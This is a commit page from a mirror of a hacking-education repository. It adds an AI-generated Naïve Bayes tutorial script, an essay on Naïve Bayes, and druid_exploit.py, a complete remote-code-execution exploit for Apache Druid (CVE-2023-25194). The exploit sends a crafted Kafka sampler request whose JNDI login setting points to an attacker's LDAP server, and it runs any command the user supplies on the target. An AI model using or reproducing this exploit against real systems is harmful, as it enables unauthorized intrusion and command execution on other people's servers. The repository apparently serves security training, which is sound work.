mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-18 19:06:08 +00:00
adding more examples
This commit is contained in:
parent
99a0fce025
commit
03afe63f9c
42
ai_security/ML_Fundamentals/ai_generated/Naïve_Bayes.py
Normal file
42
ai_security/ML_Fundamentals/ai_generated/Naïve_Bayes.py
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
Sure! The following is a python script that demonstrates the Naïve Bayes algorithm using the famous Iris dataset:
|
||||||
|
|
||||||
|
```python
|
||||||
|
import numpy as np
|
||||||
|
from sklearn.datasets import load_iris
|
||||||
|
from sklearn.model_selection import train_test_split
|
||||||
|
from sklearn.naive_bayes import GaussianNB
|
||||||
|
from sklearn.metrics import accuracy_score
|
||||||
|
|
||||||
|
# Load the Iris dataset
|
||||||
|
iris = load_iris()
|
||||||
|
|
||||||
|
# Split the dataset into training and testing sets
|
||||||
|
X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=42)
|
||||||
|
|
||||||
|
# Create an instance of the Naïve Bayes classifier
|
||||||
|
classifier = GaussianNB()
|
||||||
|
|
||||||
|
# Train the classifier using the training data
|
||||||
|
classifier.fit(X_train, y_train)
|
||||||
|
|
||||||
|
# Make predictions on the testing data
|
||||||
|
y_pred = classifier.predict(X_test)
|
||||||
|
|
||||||
|
# Calculate accuracy of the model
|
||||||
|
accuracy = accuracy_score(y_test, y_pred)
|
||||||
|
print("Accuracy:", accuracy)
|
||||||
|
```
|
||||||
|
|
||||||
|
In this script, we start by importing the necessary libraries: `numpy` for numerical operations, `sklearn.datasets` to load the Iris dataset, `sklearn.model_selection` to split the data into training and testing sets, `sklearn.naive_bayes` for the Naïve Bayes classifier, and `sklearn.metrics` for calculating accuracy.
|
||||||
|
|
||||||
|
Next, we load the Iris dataset using `load_iris()` function. Then we split the data into training and testing sets using `train_test_split()` function, where `test_size=0.2` indicates that 20% of the data will be used for testing.
|
||||||
|
|
||||||
|
We create an instance of the Naïve Bayes classifier using `GaussianNB()`. This classifier assumes that features follow a Gaussian distribution. If your data doesn't meet this assumption, you can explore other variants like multinomial or Bernoulli Naïve Bayes.
|
||||||
|
|
||||||
|
We train the classifier using the training data by calling the `fit()` method and passing in the features (X_train) and corresponding labels (y_train).
|
||||||
|
|
||||||
|
Then, we make predictions on the testing data using the `predict()` method and passing in the features of the test set (X_test).
|
||||||
|
|
||||||
|
Finally, we calculate the accuracy of the classifier by comparing the predicted labels with the true labels from the testing set using the `accuracy_score()` function.
|
||||||
|
|
||||||
|
Hope this helps to demonstrate the Naïve Bayes algorithm in python!
|
23
ai_security/ML_Fundamentals/ai_generated/data/Naïve_Bayes.md
Normal file
23
ai_security/ML_Fundamentals/ai_generated/data/Naïve_Bayes.md
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
Naïve Bayes: A Simple Yet Powerful Algorithm for Classification
|
||||||
|
|
||||||
|
In the field of machine learning, one algorithm stands out for its simplicity and effectiveness in solving classification problems - Naïve Bayes. Named after the 18th-century mathematician Thomas Bayes, the Naïve Bayes algorithm is based on Bayes' theorem and has become a popular choice for various applications, including spam filtering, sentiment analysis, document categorization, and medical diagnosis.
|
||||||
|
|
||||||
|
The essence of Naïve Bayes lies in its ability to predict the probability of a certain event occurring based on the prior knowledge of related events. It is particularly useful in scenarios where the features used for classification are independent of each other. Despite its simplifying assumption, Naïve Bayes has proven to be remarkably accurate in practice, often outperforming more complex algorithms.
|
||||||
|
|
||||||
|
But how does Naïve Bayes work? Let's delve into its inner workings.
|
||||||
|
|
||||||
|
Bayes' theorem, at the core of Naïve Bayes, allows us to compute the probability of a certain event A given the occurrence of another event B, based on the prior probability of A and the conditional probability of B given A. In classification problems, we aim to determine the most likely class given a set of observed features. Naïve Bayes assumes that these features are conditionally independent, which simplifies the calculations significantly.
|
||||||
|
|
||||||
|
The algorithm starts by collecting a labeled training dataset, where each instance belongs to a class label. For instance, in a spam filtering task, the dataset would consist of emails labeled as "spam" or "not spam" based on their content. Naïve Bayes then calculates the prior probability of each class by counting the occurrences of different classes in the training set and dividing it by the total number of instances.
|
||||||
|
|
||||||
|
Next, Naïve Bayes estimates the likelihood of each feature given the class. It computes the conditional probability of observing a given feature for each class, again counting the occurrences and dividing it by the total number of instances belonging to that class. This step assumes that the features are conditionally independent, a simplification that allows efficient computation in practice.
|
||||||
|
|
||||||
|
To make a prediction for a new instance, Naïve Bayes combines the prior probability of each class with the probabilities of observing the features given that class using Bayes' theorem. The class with the highest probability is assigned as the predicted class for the new instance.
|
||||||
|
|
||||||
|
One of the advantages of Naïve Bayes is its ability to handle high-dimensional datasets efficiently, making it particularly suitable for text classification tasks where the number of features can be large. It also requires a relatively small amount of training data to estimate the parameters accurately.
|
||||||
|
|
||||||
|
However, Naïve Bayes does have some limitations. Its assumption of feature independence might not hold true in real-world scenarios, leading to suboptimal performance. Additionally, it is known to struggle with instances that contain unseen features, as it assigns zero probability to them. Techniques such as Laplace smoothing can be applied to address this issue.
|
||||||
|
|
||||||
|
Despite these limitations, Naïve Bayes remains a popular and frequently employed algorithm in machine learning due to its simplicity, efficiency, and competitive performance. Its ability to handle large-scale datasets and its resilience to irrelevant features make it a go-to choice for many classification tasks.
|
||||||
|
|
||||||
|
In conclusion, Naïve Bayes is a simple yet powerful algorithm that leverages Bayes' theorem and the assumption of feature independence to solve classification problems efficiently. While it has its limitations, Naïve Bayes continues to shine in various real-world applications, showcasing the strength of simplicity in the field of machine learning.
|
131
web_application_testing/additional_exploits/druid_exploit.py
Normal file
131
web_application_testing/additional_exploits/druid_exploit.py
Normal file
@ -0,0 +1,131 @@
|
|||||||
|
'''
|
||||||
|
This script exploits the Druid RCE vulnerability (CVE-2023-25194) to execute commands on the target machine.
|
||||||
|
'''
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
|
||||||
|
def send_post_request(url, headers, data):
|
||||||
|
'''
|
||||||
|
send post request
|
||||||
|
:param url: url
|
||||||
|
:param headers: headers
|
||||||
|
:param data: data
|
||||||
|
:return: None
|
||||||
|
'''
|
||||||
|
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||||
|
|
||||||
|
status_code = response.status_code
|
||||||
|
content = response.content.decode('utf-8')
|
||||||
|
|
||||||
|
if status_code == 500 or 'createChannelBuilde' in content:
|
||||||
|
print('[+] Exploit Success ~')
|
||||||
|
else:
|
||||||
|
print('[-] Exploit maybe fail.')
|
||||||
|
|
||||||
|
|
||||||
|
def get_data(jndi_ip, cmd):
|
||||||
|
'''
|
||||||
|
Function to get data for POST request body
|
||||||
|
:param jndi_ip: jndi_ip
|
||||||
|
:param cmd: command to execute
|
||||||
|
:return: data
|
||||||
|
'''
|
||||||
|
data = {
|
||||||
|
"type": "kafka",
|
||||||
|
"spec": {
|
||||||
|
"type": "kafka",
|
||||||
|
"ioConfig": {
|
||||||
|
"type": "kafka",
|
||||||
|
"consumerProperties": {
|
||||||
|
"bootstrap.servers": "127.0.0.1:6666",
|
||||||
|
"sasl.mechanism": "SCRAM-SHA-256",
|
||||||
|
"security.protocol": "SASL_SSL",
|
||||||
|
"sasl.jaas.config": f"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://{jndi_ip}:1389/Basic/Command/base64/{cmd}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
|
||||||
|
},
|
||||||
|
"topic": "test",
|
||||||
|
"useEarliestOffset": True,
|
||||||
|
"inputFormat": {
|
||||||
|
"type": "regex",
|
||||||
|
"pattern": "([\\s\\S]*)",
|
||||||
|
"listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
|
||||||
|
"columns": [
|
||||||
|
"raw"
|
||||||
|
]
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"dataSchema": {
|
||||||
|
"dataSource": "sample",
|
||||||
|
"timestampSpec": {
|
||||||
|
"column": "!!!_no_such_column_!!!",
|
||||||
|
"missingValue": "1970-01-01T00:00:00Z"
|
||||||
|
},
|
||||||
|
"dimensionsSpec": {
|
||||||
|
|
||||||
|
},
|
||||||
|
"granularitySpec": {
|
||||||
|
"rollup": False
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"tuningConfig": {
|
||||||
|
"type": "kafka"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"samplerConfig": {
|
||||||
|
"numRows": 500,
|
||||||
|
"timeoutMs": 15000
|
||||||
|
}
|
||||||
|
}
|
||||||
|
# print(data)
|
||||||
|
return data
|
||||||
|
|
||||||
|
def base64_encode(original_str):
|
||||||
|
'''
|
||||||
|
Function to encode string with base64
|
||||||
|
:param original_str: original string
|
||||||
|
:return: encoded string
|
||||||
|
'''
|
||||||
|
|
||||||
|
original_bytes = original_str.encode('utf-8')
|
||||||
|
encoded_bytes = base64.b64encode(original_bytes)
|
||||||
|
encoded_str = encoded_bytes.decode('utf-8')
|
||||||
|
return encoded_str
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
'''
|
||||||
|
The following are the arguments required for the script to run successfully
|
||||||
|
-t, --target: target IP or hostname
|
||||||
|
-j, --jndi-ip: jndi_ip
|
||||||
|
-c, --cmd: command to execute
|
||||||
|
'''
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
parser.add_argument('-t', '--target', type=str, required=True, help='target IP or hostname')
|
||||||
|
parser.add_argument('-j', '--jndi-ip', type=str, required=True, help='jndi_ip')
|
||||||
|
parser.add_argument('-c', '--cmd', type=str, required=True, help='command to execute')
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
# Target URL
|
||||||
|
url = f"http://{args.target}:8888/druid/indexer/v1/sampler"
|
||||||
|
print("[+] URL:" + url)
|
||||||
|
print("[+] Target IP:" + args.target)
|
||||||
|
print("[+] JNDI IP:" + args.jndi_ip)
|
||||||
|
print("[+] Command:" + args.cmd)
|
||||||
|
|
||||||
|
# Headers for POST request
|
||||||
|
headers = {
|
||||||
|
"Accept-Encoding": "gzip, deflate",
|
||||||
|
"Accept": "*/*",
|
||||||
|
"Accept-Language": "en-US;q=0.9,en;q=0.8",
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36",
|
||||||
|
"Connection": "close",
|
||||||
|
"Cache-Control": "max-age=0",
|
||||||
|
"Content-Type": "application/json"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get data for POST request body
|
||||||
|
data = get_data(args.jndi_ip, base64_encode(args.cmd))
|
||||||
|
|
||||||
|
# Send POST request
|
||||||
|
send_post_request(url, headers, data)
|
Loading…
Reference in New Issue
Block a user